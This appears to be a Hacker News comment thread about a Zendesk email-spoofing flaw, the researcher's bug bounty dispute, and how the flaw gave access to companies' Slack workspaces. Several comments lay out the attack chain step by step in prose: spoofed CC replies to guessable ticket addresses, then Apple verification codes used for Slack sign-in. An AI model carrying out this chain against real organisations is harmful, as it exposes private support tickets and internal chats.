Something similar has been discussed on HN before: https://news.ycombinator.com/item?id=38720544 but the overall attack vector of "get registration email send to somewhere an attacker can view it" is not novel at all; it's also how some police database websites have been popped in the past (register as @fbi.gov which automatically gives you access; somehow access the inbox of @fbi.gov due to some public forwarding, for example)
Yes, I expect a security engineer to hold knowledge. That's why they have a job, instead of the security team being replaced with an LLM. If nobody on the team has that experience, it speaks exactly to the issue outlined in the OP: not enough knowledge of security issues beyond the basics.
>Without a broader PoC to show how it could be weaponized, it's hard to say that Zendesk was egregiously wrong here
There was a PoC of how to view someone else's ticket (assuming you know the other person's email and approximately when the ticket was filed).
>it's not crazy to think a security engineer reading the report may assume that stuff would cover their butts
It sounds like they got a report saying "I can spoof an email and view someone else's report". Why would they assume the spam protection would protect them when they have a report saying it's not protecting them?
I suppose my point is "read someone else's ticket" is far from the worst case scenario here. It certainly sounds like zendesk didn't care to protect ticket contents ... Which the more I think about it is pretty egregious, as support tickets can include PII.
In general, I do expect for the folks reading hackerone reports to make some mistakes; there's a lot of people who will just run a vulnerability scanner and report all the results like they've done something useful. Sometimes for real bugs you have to explain the impact with a good "look what I can do with this."
Also, the poster didn't share their submission with us, just the responses. So it's hard to know how clear they were to Zendesk. A good bug with a bad explanation I would not expect to get paid.
>Sometimes for real bugs you have to explain the impact with a good "look what I can do with this."
I'm not sure. Anybody that keeps up to date with security (e.g. those working on a security team) should know that ticketing systems also contain credentials sometimes. For example, when Okta was breached, the main concern was that Okta support tickets contain... session tokens, cookies, and credentials!
What's the point of having a security team that can't directly link external experience to their own system? Learning the same mistakes that have already been known?
I use a competitor to HackerOne. I view all submissions pre-triage and would have taken it seriously, even if I made a mistake in program scope. I have paid researchers for bugs out of scope before because they were right.
HackerOne is an awful company with a terrible product. Not the first time I’ve heard of their triage process or software getting in the way of actual bug bounty.
My only experience with them was when I found a pretty serious security bug and noticed the company in question had a bounty with them. Opened an account on H1, reported the bug, got "not a serious issue", promptly closed the H1 account. If the company is incompetent or relying on an incompetent 3rd party bug bounty service provider, I won't deal with them. I don't need this in my life.
The company did fix the issue a few months later, so there's that.
They all are. Bugcrowd once told me that, "yes, it's not a security issue or even a bug, but we recommend providing small (100€) rewards for non-bugs to keep researchers engaged!"
"Everything is bad" sounds like a defeatist stance.
Fact is they are better than triaging everything yourself and also better than outright ignoring all vuln reports.
It’s an imperfect system I agree - but it’s the best we have
It's incredibly hard and resource-intensive to run a bounty program, so anyone doing it for shortcuts or virtue signaling will quickly realize they're not mature enough to run one.
“2) seen as a cheaper alternative to someone who knows anything about security - "why hire someone that actually knows anything about security when we can just pay a pittance to strangers and believe every word they say?"”
It doesn’t make sense, companies with less revenue aren’t the ones doing this. It’s usually the richer tech companies.
It is also larger tech companies that have basically infinite attack surface.
So my argument is that it does not matter how much they spend on security, they will get hacked anyway; the only thing they can do is keep spending in check and limit the scope of hacks.
> A $1.3 billion revenue company being too tight to pay this after all, even on their 2nd chance, is so short-sighted it's absurd.
I'll give an "another side" perspective. My company was much smaller. Out of 10+ "I found a vulnerability" emails I got last year, all were something like mass-produced emails generated based on an automated vulnerability scanning tool.
Investigating all of those for "is it really an issue" is more work than it seems. For many companies looking to improve security, there are higher ROI things to do than investigating all of those emails.
https://www.sqlite.org/cves.html provides an interesting perspective. While they thankfully already have a pretty low attack surface from their overall design/purpose/etc., you can see a decent number of vulns reported that are either 'not their fault' (i.e. wrappers/consumers) or are close enough to the other side of the airtight hatchway (oh, you had access to the database file to modify it in a malicious way, and modified it in a malicious way)[0]
We also had this problem in my previous company a few years ago, a 20-person company, but somehow we attracted much more attention.
In one specific instance, we had 20 emails in a single month about a specific WordPress PHP endpoint that had a vulnerability, on a separate marketing site on another domain. The thing is, it had already been replaced by our WordPress contractor as part of the default install, but it was still returning 200.
But being a static page didn't stop the people running scanners from asking us for money, even after they were informed of the above.
We have a policy to never acknowledge unsolicited emails like that unless they follow the simple instructions set out in our /.well-known/security.txt file (see https://en.wikipedia.org/wiki/Security.txt) - honestly, all they have to do is put “I put a banana in my fridge” as the message subject (or use PGP/GPG/SMIME) and it’ll be instantly prioritised.
The logic being that any actual security-researcher with even minimal levels of competency will know to check the security.txt file and can follow basic instructions; while if any of our actual (paying) users find a security issue then they’ll go through our internal ticket site and not public e-mail anyway - so all that’s left are low-effort vuln-scanner reports - and it’s always the same non-issues like clickjacking (but only when using IE9 for some reason, even though it’s 2024 now…) or people who think their browser’s Web Inspector is a “hacking tool” that allows anyone to edit any data in our system…
And FWIW, I’ve never received a genuine security issue report with an admission of kitchen refrigeration of fruit in the 18 months we’ve had a security.txt file - it’s almost as if qualified, competent professionals don’t operate like an embarrassingly pathetic shakedown.
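For anyone who hasn't seen one, a security.txt along these lines would do the job (fields per RFC 9116; the domain and the banana instruction are of course specific to this commenter's setup):

```text
# Served at https://example.com/.well-known/security.txt
Contact: mailto:security@example.com
Expires: 2026-01-01T00:00:00.000Z
Encryption: https://example.com/pgp-key.txt
Preferred-Languages: en
# To show you actually read this file, put "I put a banana in my
# fridge" in your message subject (or sign with PGP/GPG/S-MIME)
# and your report will be instantly prioritised.
```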
I saw a great presentation from Finn.no on their bug bounty program. They had had great success, despite the amount of work it took. Much more so than the three different security companies they hired each year to find vulnerabilities.
They also had a security.txt file and had received several emails through that, but all of it was spam. Ironically they had received more real security vulnerabilities through people contacting them on LinkedIn than through their security.txt file.
Your mileage may vary, but it didn’t seem like the security.txt file was read by the people one would hope would read it.
I understand, this is exactly why I noted "even on their 2nd chance". The initial lack of payout/meaningful response was incompetency by not understanding the severity of the vuln. Fine, happens.
But after the PoC that showed the severity in a way that anyone could understand, they still didn't pay. That's the issue. The whole investigation was done for them.
I previously worked for a mortgage software startup that attracted interest from big banks.
To ease concerns about our scalability and longevity, we moved from a tiny office to an office with a lot of empty space.
This strategic move supposedly signaled to prospective corporate clients that we were committed to sustaining our solution over the long term rather than just a few years, but in the end the company went out of business. So much for that.
Yet the same corporates will eat up anything that Google or MSFT does, while we all know they kill projects just like anyone else, or like any smaller company going under.
I am actually seriously interested in what people there do day to day. I’m wondering this about a lot of very large companies, I would definitely watch a documentary about that.
Hour-long meetings about whether the copy should read "data center," "datacenter," "data-center," or whether it is really even correct to say any of these at all. And then negotiating with the design folks to fit in the extra character. Only to throw it all away because nobody thought about the fact that it has to support 5 different languages.
I wish I was kidding. Used to work at a place that did crap like that, pulling in developers for these time sucks because "only they really know the correct technical usage for our industry."
It's not weird to pick one and keep a consistent style, for example by looking at Google or at Wikipedia or some other source if the dictionary lists both or neither, but to have meetings about it?!
I work at a similar-size company. Basically they are like most companies: building out the next 5 years while also keeping the lights on at four nines. There can be a lot of depth to a product that you don't see. Anyone who asks "why do you need X people" often hasn't tried a side hustle where you see 360° of all the activities involved.
Building at scale without racking up a big bill, while hitting SLAs, requires a decent amount of effort.
At some point, most of your engineering time is spent on trying to understand what the previous team did. There's probably some engineer at Zendesk banging his head on the table because his boss wouldn't let him fix the sequential ticket IDs when he found them two months ago.
I work at one of the biggest companies in the world (employee- and revenue-wise) and it's basically a runaway reaction of well-articulated desk employees jerking each other off, telling each other that they are so very important.
And the common management approach to anything not working immediately is "throw another 1,000 employees at the project", and the middle managers measure their success by how many employees they are managing, so it's a train without brakes. Hope it goes bankrupt soon.
Big companies are places where you get kudos for only taking two weeks to solve a problem you’ve solved elsewhere in two days. To an extent it’s Little’s Law. The latency requires more “CPUs” to handle the traffic.
This is super loud to me RN because some of these "big" companies are case studies in Mythical Man Month's "N channels of communication" as well as weird flashbacks to discussions on costs context switching and schedulers in various CS courses.
Every single click in ServiceNow takes a full 2 seconds to do anything. For a ticketing system. Insane.
What’s more insane is that it is still better than the vast majority of ticketing software. I don’t know what it is about ticketing and Helpdesk that it always ends up like that.
> I don’t know what it is about ticketing and Helpdesk that it always ends up like that.
The curse of B2B software is that every new big customer wants some custom feature or configuration that is the "deal breaker" for their multi-million dollar contract signing. And everyone except engineering is eager to give it to them because it's not their problem once the ink is dry. Support and renewals are the next guy's problem.
What's interesting is that Frank Slootman touts this transformation as a huge success in his book and talks at length about his conflict with Fred Luddy (who originally authored the simple ticketing incarnation of the ServiceNow monsterblob). The focus on keeping things simple is highlighted as an example of nerds' nearsighted thinking.
I'm sure it's a huge success for the few earning the profits from ServiceNow.
Like any SaaS, the more feature boxes you check, the more potential customers you can "satisfy". And the worse the UX gets for the average user (which then gets driven to purchasing more support).
Great for business (the few), terrible for users (the many). No contradiction there.
Never said that, but a competent engineer should be able to build like 75% of the main functionality of Zendesk over a weekend.
Now, I understand there's probably a lot more to it which is why I would expect it to be a company of around 50 engineers and 150 business/marketing/etc and that's being generous.
The hill I'd die on is that, with money not being a scarce resource and a technically feasible challenge present, a team of 200 should be able to build and sustain almost anything in the world. And that's being even generous. I think realistically a team of 50 should be able to build almost anything
That’s a very HN take but the reality is that the tech is usually never the hard part. Selling, supporting, legal, all the certifications and enterprise contracts you have to do for a product like that are the hard part.
Software developers being surprised that software companies need to do a lot more than just write code is kind of like sailors being surprised that global logistics involves a lot more than handling a ship.
Bug bounty people do this all the time. It's almost always a sign that your bug is something silly, like DKIM.
Later
I wrote this comment before rereading the original post and realizing that they had literally submitted a DKIM report (albeit a rare instance of a meaningful one). Just to be clear: in my original comment, I did not mean to suggest this bug was silly; only that in the world of security bug bounties, DKIM reports are universally viewed as silly.
Wait... it looks like Zendesk only fixed the issue of Apple account verification emails being added to tickets, not actually the underlying issue?
> In addition to this, we also implemented filters to automatically suspend the following classes of emails: user verification emails sent by Apple, based on the Reply-To and Message-Id header values, and non-transactional emails from [email protected]. Over the coming months, we will continue to look into opportunities to strengthen our Sender Authentication functionality and provide customers with more granular and advanced security controls over the types of emails that get suspended or rejected.
So is it still possible to hijack anyone's support tickets using the default configuration of Zendesk if you just happen to know their email and ticket ID?
Yeah. Zendesk only put a bandaid in place to prevent this particular attack vector for the Slack infiltration attack, and did nothing for the initially reported issue.
Zendesk could refuse to allow "ticket collaboration" if customers had a missing or insufficiently secure SPF/DMARC configuration, or at least make customers check a box that says "Tickets may leak their contents to anyone who can send emails".
The piece the author is missing, and why Zendesk likely ignored this, is impact - and it's something I continually see submissions lacking. As a researcher, if you can't demonstrate the impact of your vulnerability, then it looks like just another bug. A public program like Zendesk's is going to be swamped with reports, and they're using HackerOne triagers to handle that volume. The triage system reads through a lot of reports - without clear impact, lots of vulnerabilities look like "just another bug". Notice that Zendesk took notice once mondev was able to escalate to an ATO (account takeover)[1]. That's impact, and that gets noticed!
Yes. But respectfully (residual frustration at Zendesk might make me curt here): if their security triage team can't see how dangerous it is for an attacker to get access to an arbitrary thread on their CLIENTS' corporate email chains (in this world of email logins and SSO), then they have a big lapse in security culture, no?
Yes, the researcher could have teed himself up better, but this says way more about Zendesk than it does about the 15-year-old researcher.
Unauthorized read access to private emails you were never legitimately CCed on already is impact. It should not be necessary to come up with a further exploit daisy chained on top of that in order to be taken seriously. (Otherwise why stop at Slack access? Why is that automatically "impact" if email access isn't?)
The researcher showed how they could hop onto any Zendesk support ticket thread with zero authentication, so that should have been enough given Zendesk was exposing customer data via that attack path.
Clearly Zendesk needs to change things so that the email address that is created for a ticket isn’t guessable.
Exploit or no, the bug and potential impact are the same. I personally find it a waste of time to sink evenings into an exploit when they're going to fix the bug anyway if I simply tell them about the problem. They also know the system better than I do and can probably find a bigger impact anyway
Of course, this is only a good strategy if you're just wanting to do a good deed and not counting on getting more than a thank you note, but Zendesk or Hackerone (whoever you want to blame here) didn't even accept the bug in the first place. That's the problem here, not the omission of an exploit chain
The dude demonstrated the ability to infiltrate a client’s Slack instance via their vulnerability. If that’s not enough to make the hairs on your neck stand on end as an engineer, go fucking do something else.
I don't think it is. Getting arbitrary access to corporate support ticket chains seems pretty high impact to me? Isn't that a gigantic data breach (also probably a GDPR breach) already, before you get to the Slack takeover?
The audience of a security contact point (be that HackerOne or security@) is a technical person.
We add impact demonstrations to a few findings per pentest report because our audience is broader: the nontechnical people who allocate the money need to understand why this is useful, and that the devs/sysadmins need enough time to do things right (developers and sysadmins are often sufficiently skilled, but are under delivery pressure). A sufficiently technical team, when the bug is adequately explained, doesn't need a functional exploit to see whether it's real and impactful.
The worst part: "We kindly request you keep this report between you and Zendesk". After being notified of a problem on their side and ignoring it, now they want to keep things hush-hush? Keeping it quiet is exactly what the author did in the first place, but they chose to brush it aside. That itself is highly unprofessional. With such an attitude, I'm not surprised that they did not pay out the bounty.
The correct procedure when they fuck up and close the report is to ask for the report to be made public. Had he done this, this would have been a non-issue.
The reason people don't do this is because they think they have something that can be modified into another bug. Which is exactly what happened here.
You can't ask for money in exchange for not revealing a bug. That's blackmail which is illegal and ethically dubious.
White hat hackers do not require companies to pay them in exchange for not revealing a bug; the reveal of a bug only happens if a company doesn't fix it. Companies can be jerks and refuse to pay anything. That doesn't give you the right to blackmail them; you and other security researchers can just refuse to help them in the future.
A refusal to fix the vulnerability is what happened in the original blogpost, so it was fair game for release since the company doesn't care.
Hackers that don't care about ethics or legality won't bother blackmailing companies with vulnerabilities. They'll sell or use the vulnerability to steal more important data, and blackmail companies for millions of dollars in crypto.
I don't think this is true. I'm not a lawyer and this is not legal advice, but I think it's hard to fit the elements of an extortion statute to a "threat" to disclose the results of technical research work you yourself did. Moreover, if a vendor is working with HackerOne, they've already implicitly consented to its norm of non-disclosure in exchange for payment. Further, in something like 15 years of bounty programs, I haven't heard of any cases like this having been filed, and bounty researchers threaten to publish all the time.
I also disagree that there's anything ethically dubious about it.
Depends on the country as well. There was recently a case in Finland where a couple of people found an issue in certain locks made by Abloy. They offered to sell the details to Abloy and suggested that they could alternatively publish them on YouTube. They were found guilty of aggravated blackmail (I'm not sure of the proper term in English; essentially just a more serious form, due to e.g. demanding a lot of money). They are planning to appeal, so there is a chance it will get overturned.
To correct you: the revealing of a past bug happens almost all the time when a company does fix the bug. That's what lets researchers publish their findings and show their work publicly, and it usually gives the company some positive PR for being willing and responsive in fixing issues. See the CVE program.
Gotcha. The moment you attach a monetary condition it can be seen as extortion. In that case I believe the only responsible thing to do is disclose using customary, reasonable waiting periods.
Doubtful. It's probably just incompetence, rather than malice.
The incident almost certainly cost Zendesk more in (according to the gist) lost contracts and reputational damage than it would've cost to pay the security researcher a bounty.
Risk of a bad rep when the researcher reports to HN or makes some noise. Then future security researchers don't try to find issues on your platform, and it's more insecure as a result.
For a sensible large company, it’s not worth being stingy over (relative) pennies. They waste money like it’s water. They might as well spend where it matters. Bug bounties won’t even show on their bottom line, but cleanup for an exploited issue will.
Aaaaaahhh I am on a rollercoaster of customer experience. I am beyond annoyed at Zendesk for stiffing this kid, but actually kinda charmed by this quirky marketing gimmick.
But also, SECURITY culture concerns beat culture culture. Companies should def consider ditching them for this lapse and their poor form in making it right.
If Zendesk is smart, they should hop on this thread and pay this kid out while everyone is still paying attention in one place, rather than later, when everyone is quietly making business decisions in a thousand little alcoves of the internet.
Otherwise, this is the best thing to happen to the Zendesk Alternatives in a long time
>but actually kinda charmed by this quirky marketing gimmick.
I'm actually pretty annoyed at the stupidity. It's the kind of thing that even a shitty search engine won't be fooled by, and hey, when I search for Zendesk alternatives I don't see any brand called "Zendesk Alternative" in the first few results.
I mean, it's like they're too stupid to do what every other weaselly scumbag does: get some fake reviews up comparing your brand to alternatives, with the reviews carefully weighted so your target customer base concludes "uh, I guess Zendesk is really what we want then."
Or at least buy search ads, with "Zendesk - There is No Alternative" showing up before all the alternatives.
It's OK, Zendesk, if you use my clever slogan because you can't think of one on your own; I'm not expecting you to pay me for it.
OK, Google for me doesn't show it, as mentioned. The problem with Google is that it's difficult to see how your profile is skewing the algorithm, although I also suppose our talking about it here is ranking it higher.
I think that's pretty funny and not particularly malevolent. It's a fake alt rock band called Zendesk. It's obviously tongue-in-cheek and not going to deceive anyone.
Also, anytime I search for "X alternative" the results are all AI-generated garbage anyway, so I'd welcome something quirky and original like this in my results.
It seems like you're being sarcastic, but I think that's really what happened. I think it's much more about getting press for doing something funny than it is about having a meaningful impact on cluttering search results.
It's the same reason why Google paid its marketing team to make a promo for Gmail Blue (back in 2013 when Google was still doing legitimately funny fake promos):
Also note that the song (or its "lyrics" at least) has "Open Source" in its title, so they can position for the "Zendesk Open Source Alternative" long tail.
> While not illegal, it shows the way they think, a sort of manipulative pettiness
Search engine chaff has been in the toolbag of "reputation management" PR firms for a while. Boris Johnson (former UK PM) deployed it many years ago to drown out a viral picture of him in front of a red bus bearing an ad he no longer wanted to be associated with, so he was coached to tell an interviewer he has a hobby of painting model buses red.
They need to get the band back together! Release a new album, and go on a world wide reunion tour. And in 2026 they’ve got to release a Best of Zendesk Alternative remastered album.
And in 2027, Zendesk finds that the strategy worked. A little too well! Now the top search result for Zendesk is the rock band, and if you ask an AI about Zendesk, the AI starts yappin about a rock band too! Hahaha
> they have toured the world, headlining major festivals and sharing the stage with legendary acts like Sweater Head, DynoPlax, and The Banana Nuts. Now, Zendesk Alternative has begun a new chapter in their storied career. They have joined forces with Zendesk® to record an anthemic concept album of epic proportions. On the surface, it's a collection of songs about customer service. Underneath, it's about so much more. Finally, Zendesk Alternative and Zendesk® the customer service software company are together at last.
That is hilarious, but also the most non-punk-rock thing I've ever read. If Apple did it, everyone here would be fawning over what a genius move it was.
I have a similar conspiracy theory about DDG, the rapper. I used to get to DuckDuckGo by typing "ddg" into Google. Now it's all mentions of DDG the rapper.
This was a great writeup, really clear and engagingly written, about an interesting and subtle bug. If the author hadn't mentioned they were 15 I would have assumed it was from a seasoned security professional.
To Daniel/hackermondev: whatever you're doing, keep it up!
Agreed. If I were hiring and the author applied, I would base most of my decision on the quality of this article alone. Just goes to show how engaging communication beats whiteboard interviews, at least for me.
Slack seems to be getting off too easy here. The security—as implemented by Fortune 500 customers??—of an org-wide security domain (i.e. what everyone in an org can see) depends on whether any of the supported OAuth providers can be tricked into provisioning an account with @targetorg.com?
This architecture makes 0 sense to me. Even if an org has totally outsourced its identity and auth management to Google (is this possible?), presumably that would include controls over how new @targetorg.com identities are created on the Google end.
No F500 companies are using Apple as an identity provider since they definitely don't sell such services. So why would an F500 company configure Slack to allow Apple OAuth & introduce this vulnerability?
If you're using Google for identity and authentication, you can definitely control who has an active account in your domain. There can be some lag time before disabling or removing someone truly disables all their downstream accesses, but that's largely outside Google's control. The only way to trick your way into getting a corporate domain email address is to socially engineer a domain admin.
Tangentially, this does raise one of my big issues with using OAuth2 for single-sign-on though, which is that it really doesn't address the third-party authorization problem well. Ok, you're [email protected], Google has verified that, and example.com is our domain, so we're letting you into our app Foobar. Now what? The scopes you requested were for Google APIs only and have nothing to do with Foobar really. So now we need to implement an authorization system in Foobar that decides what [email protected] can actually do. This part, and how to do it right, gets glossed over (at best!) by discussions on OAuth2. It also gets glossed over by product and security when they want things "SSO-enabled", which means development time doesn't get budgeted for it. Even just using groups to control coarse access levels requires integration with provider-specific APIs. OAuth2 is great for identity and authentication, but far too little attention has been paid to doing authorization right.
This comment makes the most sense to me in this thread.
Further, IMO, sure it's a bug that one can say they control [email protected]. But IMO the real issue is lousy, permissive authorisation that gives access to anything simply by virtue of controlling a @company.com mail. Surely some HR/tech person, when an employee is being onboarded, should be enabling access to some core systems (probably by adding them to a group), and the default state for an account with no groups should be no access.
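That default-deny posture can be sketched in a few lines. This is a minimal illustration, assuming a hypothetical group-to-permission mapping and an in-memory directory; it is not any product's real API:

```python
# Sketch of default-deny authorization after SSO. Group names and the
# directory structure are illustrative assumptions.

ROLE_GRANTS = {
    "eng": {"read_tickets", "write_tickets"},
    "support": {"read_tickets", "write_tickets", "close_tickets"},
}

def permissions_for(email: str, directory: dict[str, list[str]]) -> set[str]:
    """Union of grants for the user's groups.

    A verified @company.com email with no group memberships gets an
    empty set: authentication alone confers no access.
    """
    perms: set[str] = set()
    for group in directory.get(email, []):  # default: no groups, no access
        perms |= ROLE_GRANTS.get(group, set())
    return perms

directory = {"alice@example.com": ["eng"]}
assert permissions_for("alice@example.com", directory) == {"read_tickets", "write_tickets"}
# An address that merely exists on the domain gets nothing:
assert permissions_for("support@example.com", directory) == set()
```

The design choice is that onboarding (adding someone to a group) is the explicit act that grants access, rather than access falling out of domain ownership.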
In any large enough organisation, IME there are a lot of ways to get an @org.com email, and far more people and systems than a single centralised IT team have the ability to create one.
You can also create a non-email Google account as [email protected], as long as you can get email sent to [email protected] (ie, while you are employed by Example, Inc). Then, you leave your job, but still have a google account associated with an example.com email. Depending on how the app checks the login response, they might mistakenly assume you are part of the example.com org.
I'm pretty sure you cannot create a personal account for "[email protected]", as Google both knows about plus-suffixes (didn't they create them?) and any domains already managed under Workspaces. They also, in my experience, seem to have some understanding of domains managed by Microsoft's cloud and perhaps other competitors as well.
But even so, there's another mechanism, which is that when you create an OAuth2-enabled project in Google's console, you can specify that only known users in your domain are allowed to authenticate through it. This would lock out any personal account anyway.
I'm pretty sure you can configure your corporate Slack to only allow authentication providers you choose. So if you have a corporate SSO you can just allow that.
I'm not sure (maybe it's the case only with email auth, not oauth). But there's a setting on slack to not automatically allow people with your company email address. So the tools are there to stop the attack
In case it's not clear these are the two separate vulnerabilities:
1. Zendesk allows you to add a CC to any existing support ticket by sending a (spoofed) reply from the original requestor's email address to that ticket's Reply-To address and including a CC in the email.
In some circumstances the Reply-To address is based on an auto-incrementing integer, so it can be guessed. (Although this may not always be the case: my email archives show some emails from Zendesk using the integer and others using a random alphanumeric string. It seems to vary by company, so it might be some sort of configuration setting?)
2. Slack allows third-party domain-wide logins via Sign in with Apple without additional verification that the email belongs to a real person. Here the author of the article pretends to be [email protected] to Slack and Slack lets them into the company.com channel, despite the fact that [email protected] does not actually represent a real user and is only intended to be a receiving email address that forwards into Zendesk. (This sounds more like a configuration problem than anything else though.)
Sign in with Apple is allowing you to "create an account" (author's words) on @company.com, which should not be supported in the first place. Instead, it should rely on a central directory controlled by company.com for authentication.
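The distinction can be made concrete with a small sketch, assuming hypothetical addresses and an in-memory stand-in for the company-controlled directory:

```python
# Contrast: domain-suffix trust vs. directory-backed trust for an SSO
# login. The DIRECTORY set is an illustrative stand-in for a company-
# controlled identity store, not a real API.

COMPANY_DOMAIN = "company.com"
DIRECTORY = {"alice@company.com", "bob@company.com"}  # provisioned humans only

def allow_login_domain_only(verified_email: str) -> bool:
    # Vulnerable pattern: any IdP-verified address on the domain is let in,
    # including role addresses like support@company.com.
    return verified_email.endswith("@" + COMPANY_DOMAIN)

def allow_login_directory(verified_email: str) -> bool:
    # Safer pattern: the address must also exist in the directory.
    return verified_email in DIRECTORY

assert allow_login_domain_only("support@company.com")    # attacker admitted
assert not allow_login_directory("support@company.com")  # attacker blocked
assert allow_login_directory("alice@company.com")
```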
This is a clever hack and a reminder of how a chain of smaller security issues (guessable ticket IDs, email spoofing, automatically adding emails to tickets, etc.) can lead to larger ones.
Zendesk deserves a lot of flak here, especially after they had already realized this was real. However, just to empathize a bit: the volume of spammy SPF/DKIM/DMARC "security" reports anyone running a service gets is absolutely insane. So it's very easy to accidentally misclassify what this reporter originally discovered as one of those.
Years ago I had a similar train of thought: Zendesk is used by a ton of companies for their support site, and back then HTTPOnly cookies and javascript site isolation were much less of a thing. I found an XSS bug on Zendesk, which also translates into XSS on any site that used it as `support.fortune500.com` subdomain (which was a lot). You could then use it to exploit the main site, either by leaking user cookies or reading CSRF tokens from page contents because it was a subdomain.
Zendesk gave me a tshirt but not any money for it. C'est la vie.
From what I can tell, the vulnerability wasn't even fixed: they just.. changed their spam filter? Whatever that means.
So for this to work still, you need to bypass a spam filter.
They should just enforce DMARC and SPF like Google has done, and say "your fault if you misconfigure". Default-off for the CC thing would be a good idea too, with a warning about what could happen if it's turned on. Alternatively, a non-guessable ID for the email.
Hey, now you have to bypass two spam filters, and also email verification from Apple is now marked as likely-spam. Which addresses the very specific Slack infiltration attack, but doesn't address the underlying issue.
Requiring their customers to implement SPF and DMARC as a hard technical requirement is probably bad for business. And as mentioned in TFA, they do note issues regarding SPF/DMARC in their policy.
I think in this case it's the customers of their customers, e.g. people sending emails to [email protected]. In that light requiring all emails coming into [email protected] to have SPF and DMARC is bad for business indeed, not only for Zendesk but probably also for the fictional ACME corp.
EDIT: they absolutely should not use an auto-incrementing int as a "support-chain token" though; that's a workaround they could easily do.
> EDIT: they absolutely should not use an auto-incrementing int as a "support-chain token" though; that's a workaround they could easily do.
I checked my email archives and some (but not all) of the emails I've received from Zendesk have arbitrary alphanumeric ids in the Reply-To header instead of integers. Seems to depend on the company, perhaps this is a configuration issue?
I’m not clear on that. If the support requestor doesn’t need to be from the company, then I don’t understand why the email sender has to be spoofed in the first place.
The attack requires getting yourself CC'd on a support ticket. In this case, to show how bad that is, it was a support ticket that contained a Sign in with Apple verification code that let them log into Slack as "[email protected]".
From the description, sending an email to [email protected] creates a support ticket, which you can later latch onto by adding a CC. My understanding is that, at least in order to get the full history of a ticket, including any other emails sent to [email protected], the primary sender needs to be from the company as well. Otherwise, why would you need the CC hack?
1. The attacker starts a Sign in with Apple flow using the company's support address; Apple emails a verification code there, which opens a Zendesk ticket.
2. The attacker then sends an email to [email protected] from [email protected] (spoofed), attaching their own email address in the CC field.
3. Since the attacker is now CC'ed they can read the entire history of the ticket including the legitimate email Apple sent in (1) containing the verification code.
4. Now that the attacker has verified ownership of the Apple ID with the email address [email protected] they can use that Apple ID to login to any service that grants domain-based access via Sign in With Apple, such as Slack.
My understanding is that the original sender (spoofed Apple in this case) can send a reply to support-$ticket-$id@ with a CC field, granting full access to the thread to the CC'ed address.
> We also want to address the Bug Bounty program associated with this case. Although the researcher did initially submit the vulnerability through our established process, they violated key ethical principles by directly contacting third parties about their report prior to remediation.
What was the planned response for addressing the vulnerability reported through the Bug Bounty program, and how did the plan change after the researcher escalated the issue directly to Zendesk before remediation was completed?
> ...they violated key ethical principles by directly contacting third parties about their report prior to remediation
According to the researcher, they only contacted 3rd parties after Zendesk rejected the disclosure as out of scope, as they are free to do.
If this timeline is incorrect, Zendesk should immediately correct the record. As it stands, accusing the researcher of violating ethical principles looks very bad for Zendesk. Perhaps even libelous.
That it affected Slack was a side-effect of the original bug, and not a new, previously undisclosed bug. Zendesk fixed the original bug, after rejecting the disclosure. Given all that, Zendesk is still ethically bound to honor the bounty, 3rd party disclosures notwithstanding.
Extremely poor response. You can't blame him for contacting others affected when you marked it as out of scope. And yet you fail to mention that in your blog post.
1. "While this specific issue has been resolved", that was a bug, not an issue.
2. "they violated key ethical principles by directly contacting third parties about their report prior to remediation". What is actually a violation of ethical principles is knowing about a security failure in your application and ignoring it, leaving customers at risk. Can't wait for some law to pass so people who behave like that face consequences.
3. "We have no evidence that this vulnerability was exploited by a bad actor." tl;dr: they didn't fix it until some vendor dropped them, because before that happened it was cheaper to ignore it.
This is blatant dishonesty: the post documented in detail that the reward had already been denied, and the issue ignored multiple times, before they contacted third parties. That is not an ethical violation but an ethical necessity: after Zendesk refused to act, they had an ethical responsibility to inform everyone affected.
This alone is a huge red flag that Zendesk isn't a trustworthy organization, on top of their trying to hide rather than correct security issues unless they get bad press.
If I were Zendesk, I would pay out the bounty to this kid immediately and release a detailed public apology explaining how the entire bounty review system has been revamped to take things like this much more seriously in the future.
"Unrelated" doesn't sound right. Zendesk refused to pay for the vulnerability, so the researcher used it against downstream customers of Zendesk, who did pay the researcher for the impact of that Zendesk vulnerability against their own company.
The dumb thing is that this "out of scope" thing is 100% a Hacker One failure, and exactly the kind of thing I've grown to expect from these triage teams.
"SPF, DKIM, and DMARC issues" is absolutely and positively intended to mean "we don't care if we are missing these headers on our domains", in part because this is 99.9% of drive-by beg bounties (if you are tired of getting "I HAVE FOUND A SERIOUS SECURITY ISSUE IN YOUR WEBSITE" cc'ing security@, legal@, privacy@, and your CEO on a monthly cadence, just set up a DKIM record :P)
Yes, this is technically a bug which is in the space of SPF, DKIM, and/or DMARC. But this is absolutely NOT WHAT THE EXCLUSION IS FOR. Hacker One triage teams should know better, and it's frankly embarrassing that they don't. And it's frankly mortifying that their mediation team also didn't pick up on this.
But it checks out.
This is one of the reasons I will not use Hacker One ever. Bugcrowd is slightly better. Intigriti has (so far) been pretty good. I'm not affiliated with any of them, just have been a customer of all three.
I've seen this go from -2 points to 2 points, now back to 1. Interesting how divided people are on this, when everyone I've brought this topic up with agrees that good people often get taken advantage of, especially in cases like this.
Same experience where I reported a bug, the company ghosted me, and H1 did not even allow disclosure through their platform.
I generally refuse to go through platforms now (also because I really hate being subject to the psychological pressure of a "social credit system", even though I understand why the platforms do it). So if your company doesn't have an alternative reporting form, or refuses bug bounty payouts when a valid issue was reported directly rather than through a platform (hello, Backblaze!), I'm not doing free labor for you, and you will likely hear about the bug when either someone else finds it or I include it in a public write-up (if it's a bug affecting multiple companies).
I wonder what would happen if researchers en masse were to boycott a particular platform? Disclose to the companies directly and explain they won't work with X and why. Treat any attempt by the company to kick the disclosure back to platform X as a non-response.
In my experience, telling people you've found a vulnerability in their system is met with denial or lack of care, and when you demonstrate the exploit for them to take it seriously, they sue you.
1. Zendesk allows you to add users to a support issue, and let them view the complete issue history, by sending a response email to a guessable support address from a person associated with the issue and CC'ing the person to add.
2. Zendesk depends on a spam check for inbound email validity. This check does not appear to catch instances where the sender email is spoofed. Zendesk claims this is due to DKIM/SPF/DMARC config, but I have trouble imagining that 50% of the Fortune 500 would get this wrong. There are many automated checks available.
3. Apple issues an Apple ID account to anyone who can receive a verification email sent to the mailing address ([email protected]).
4. Slack allows you to sign in to a workspace using any Apple ID associated with the workspace domain (e.g. [email protected]).
This researcher reported #2 to HackerOne and was declined. The researcher later discovered the full exploit with #3 and #4, did not update HackerOne, and contacted affected companies directly.
